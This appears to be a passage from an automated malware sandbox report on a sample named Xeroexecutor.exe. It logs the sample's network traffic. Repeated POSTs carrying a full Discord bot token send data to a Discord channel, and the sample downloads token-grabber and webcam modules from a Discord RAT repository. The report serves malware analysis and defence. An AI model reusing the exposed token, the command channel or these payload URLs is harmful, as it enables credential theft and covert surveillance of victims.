    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1715264712.004
    x-ratelimit-reset-after: 1.000
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2Fu8bG6l90l9JOVacq7Pa4cghpHOoWWMnB%2FZeFyCfBH%2Ft6EPG0Qf9LSPf9zU2BEkR%2BzBetIlsafnoZJ75DAcob10PQz4vGhVT89cIKfEXGY%2BXIBhi6aVdeChPul2"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=f181d76a0e0f11efb6b79ac70ff69aa5f0e09a6a2ccd5fe0edea1959d498408e6e9fd9d42fbd5775fee476eb4a9324f3; Expires=Tue, 08-May-2029 14:25:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=948f4f443802a6bf7701eb9ed1444e066c3e880a-1715264711; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=_6stMbfZGNtJeHtgtFb9NqukjykNIaUUXTzLq.f4tWI-1715264711133-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 88125b7b0ac77735-LHR
  • flag-us
    POST
    https://discord.com/api/v9/channels/1238134282950676521/messages
    Xeroexecutor.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
    authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 31
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Thu, 09 May 2024 14:25:11 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=f1b5d7720e0f11ef8ac69a2afe861c28; Expires=Tue, 08-May-2029 14:25:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 3
    x-ratelimit-reset: 1715264713.003
    x-ratelimit-reset-after: 1.625
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4fYgpmitI9XGFTCOECvkpOA77LqT3aIuvGWvg0pGqiWcZDl8AmZOQQybcpcccv6TE%2BuOcmkUDDnt55xMQe9%2Bd%2BFtlO45gwrjvOXUUczNPIRSd48e5NquGAotuF5P"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=f1b5d7720e0f11ef8ac69a2afe861c2857829e51cb1a8c1ccb9eba97384b7b93537ca007483cd314cc7024e245d88471; Expires=Tue, 08-May-2029 14:25:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=948f4f443802a6bf7701eb9ed1444e066c3e880a-1715264711; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=sb7g7xGgB1ReIR8sSMdB6p1Sflw3U6y0o7NLYCBKE7I-1715264711474-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 88125b7d6fb0069e-LHR
  • flag-us
    POST
    https://discord.com/api/v9/channels/1238134282950676521/messages
    Xeroexecutor.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
    authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 31
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Thu, 09 May 2024 14:25:26 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=fa7a908c0e0f11ef8fa15239c9fc6a72; Expires=Tue, 08-May-2029 14:25:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1715264727.003
    x-ratelimit-reset-after: 1.000
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OzwDyl4AN81y2GOqAcQJihZEunv5X2y%2BdytZW9W2oG7YpU7M03wmvu51L2FJLeT4WgiwCvuIwBUc8rGCEx4ocyl22aE0niSM6Y%2BDiINdaBjmuw8GOVP2t6UDzH0B"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=fa7a908c0e0f11ef8fa15239c9fc6a72e2386f67c32610e00fc96078c12b62436b198249c0fbecd8bbf7aa689ffd1681; Expires=Tue, 08-May-2029 14:25:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=c1bf6e0aa6fe3bc4e575146062fcb7c960ea5867-1715264726; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=CTf82cX6ERFRVnnpXT7cAN1cT5TgC0TS0Vgw5tH1x_c-1715264726185-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 88125bd85a89768c-LHR
  • 162.159.135.234:443
    https://gateway.discord.gg/?v=9&encording=json
    tls, http
    Xeroexecutor.exe
    2.8kB
    33.5kB
    43
    48

    HTTP Request

    GET https://gateway.discord.gg/?v=9&encording=json

    HTTP Response

    101
  • 162.159.136.232:443
    https://discord.com/api/v9/guilds/1237709600602722354/channels
    tls, http
    Xeroexecutor.exe
    1.1kB
    5.3kB
    11
    13

    HTTP Request

    POST https://discord.com/api/v9/guilds/1237709600602722354/channels

    HTTP Response

    201
  • 159.89.102.253:443
    https://geolocation-db.com/json/
    tls, http
    Xeroexecutor.exe
    888 B
    4.6kB
    10
    11

    HTTP Request

    GET https://geolocation-db.com/json

    HTTP Response

    301

    HTTP Request

    GET https://geolocation-db.com/json/

    HTTP Response

    200
  • 162.159.136.232:443
    https://discord.com/api/v9/channels/1238134282950676521/messages
    tls, http
    Xeroexecutor.exe
    1.3kB
    3.0kB
    9
    10

    HTTP Request

    POST https://discord.com/api/v9/channels/1238134282950676521/messages

    HTTP Response

    200
  • 162.159.136.232:443
    https://discord.com/api/v9/channels/1238134282950676521/messages
    tls, http
    Xeroexecutor.exe
    484.4kB
    10.8kB
    362
    183

    HTTP Request

    POST https://discord.com/api/v9/channels/1238134282950676521/messages

    HTTP Response

    200
  • 162.159.136.232:443
    https://discord.com/api/v9/channels/1238134282950676521/messages
    tls, http
    Xeroexecutor.exe
    1.2kB
    3.0kB
    9
    11

    HTTP Request

    POST https://discord.com/api/v9/channels/1238134282950676521/messages

    HTTP Response

    200
  • 162.159.136.232:443
    https://discord.com/api/v9/channels/1238134282950676521/messages
    tls, http
    Xeroexecutor.exe
    5.0kB
    3.5kB
    13
    13

    HTTP Request

    POST https://discord.com/api/v9/channels/1238134282950676521/messages

    HTTP Response

    200
  • 162.159.136.232:443
    https://discord.com/api/v9/channels/1238134282950676521/messages
    tls, http
    Xeroexecutor.exe
    1.2kB
    2.9kB
    9
    10

    HTTP Request

    POST https://discord.com/api/v9/channels/1238134282950676521/messages

    HTTP Response

    200
  • 52.111.227.14:443
    322 B
    7
  • 185.199.109.133:443
    https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll
    tls, http
    Xeroexecutor.exe
    60.8kB
    3.0MB
    1265
    2164

    HTTP Request

    GET https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll

    HTTP Response

    200
  • 162.159.136.232:443
    https://discord.com/api/v9/channels/1238134282950676521/messages
    tls, http
    Xeroexecutor.exe
    1.1kB
    2.9kB
    8
    9

    HTTP Request

    POST https://discord.com/api/v9/channels/1238134282950676521/messages

    HTTP Response

    200
  • 162.159.136.232:443
    https://discord.com/api/v9/channels/1238134282950676521/messages
    tls, http
    Xeroexecutor.exe
    1.2kB
    2.9kB
    9
    10

    HTTP Request

    POST https://discord.com/api/v9/channels/1238134282950676521/messages

    HTTP Response

    200
  • 185.199.109.133:443
    https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll
    tls, http
    Xeroexecutor.exe
    1.5kB
    43.3kB
    20
    36

    HTTP Request

    GET https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll

    HTTP Response

    200
  • 162.159.136.232:443
    https://discord.com/api/v9/channels/1238134282950676521/messages
    tls, http
    Xeroexecutor.exe
    1.2kB
    3.0kB
    9
    11

    HTTP Request

    POST https://discord.com/api/v9/channels/1238134282950676521/messages

    HTTP Response

    200
  • 162.159.136.232:443
    https://discord.com/api/v9/channels/1238134282950676521/messages
    tls, http
    Xeroexecutor.exe
    1.2kB
    3.0kB
    9
    11

    HTTP Request

    POST https://discord.com/api/v9/channels/1238134282950676521/messages

    HTTP Response

    200
  • 162.159.136.232:443
    https://discord.com/api/v9/channels/1238134282950676521/messages
    tls, http
    Xeroexecutor.exe
    1.2kB
    2.9kB
    9
    10

    HTTP Request

    POST https://discord.com/api/v9/channels/1238134282950676521/messages

    HTTP Response

    200
  • 8.8.8.8:53
    gateway.discord.gg
    dns
    Xeroexecutor.exe
    64 B
    144 B
    1
    1

    DNS Request

    gateway.discord.gg

    DNS Response

    162.159.135.234
    162.159.133.234
    162.159.130.234
    162.159.136.234
    162.159.134.234

  • 8.8.8.8:53
    discord.com
    dns
    Xeroexecutor.exe
    57 B
    137 B
    1
    1

    DNS Request

    discord.com

    DNS Response

    162.159.136.232
    162.159.137.232
    162.159.135.232
    162.159.138.232
    162.159.128.233

  • 8.8.8.8:53
    234.135.159.162.in-addr.arpa
    dns
    74 B
    136 B
    1
    1

    DNS Request

    234.135.159.162.in-addr.arpa

  • 8.8.8.8:53
    geolocation-db.com
    dns
    Xeroexecutor.exe
    64 B
    80 B
    1
    1

    DNS Request

    geolocation-db.com

    DNS Response

    159.89.102.253

  • 8.8.8.8:53
    232.136.159.162.in-addr.arpa
    dns
    74 B
    136 B
    1
    1

    DNS Request

    232.136.159.162.in-addr.arpa

  • 8.8.8.8:53
    253.102.89.159.in-addr.arpa
    dns
    73 B
    140 B
    1
    1

    DNS Request

    253.102.89.159.in-addr.arpa

  • 8.8.8.8:53
    raw.githubusercontent.com
    dns
    Xeroexecutor.exe
    71 B
    135 B
    1
    1

    DNS Request

    raw.githubusercontent.com

    DNS Response

    185.199.109.133
    185.199.111.133
    185.199.108.133
    185.199.110.133

  • 8.8.8.8:53
    133.109.199.185.in-addr.arpa
    dns
    74 B
    118 B
    1
    1

    DNS Request

    133.109.199.185.in-addr.arpa

  • 8.8.8.8:53
    13.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    13.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2676-0-0x00000281E93F0000-0x00000281E9408000-memory.dmp

    Filesize

    96KB

  • memory/2676-1-0x00007FFA5EE13000-0x00007FFA5EE14000-memory.dmp

    Filesize

    4KB

  • memory/2676-2-0x00000281EBAB0000-0x00000281EBC72000-memory.dmp

    Filesize

    1.8MB

  • memory/2676-3-0x00007FFA5EE10000-0x00007FFA5F7FC000-memory.dmp

    Filesize

    9.9MB

  • memory/2676-4-0x00000281EC3B0000-0x00000281EC8D6000-memory.dmp

    Filesize

    5.1MB

  • memory/2676-5-0x00007FFA5EE13000-0x00007FFA5EE14000-memory.dmp

    Filesize

    4KB

  • memory/2676-6-0x00007FFA5EE10000-0x00007FFA5F7FC000-memory.dmp

    Filesize

    9.9MB

  • memory/2676-7-0x00000281EBE80000-0x00000281EC14A000-memory.dmp

    Filesize

    2.8MB

  • memory/2676-8-0x00000281EB000000-0x00000281EB00E000-memory.dmp

    Filesize

    56KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.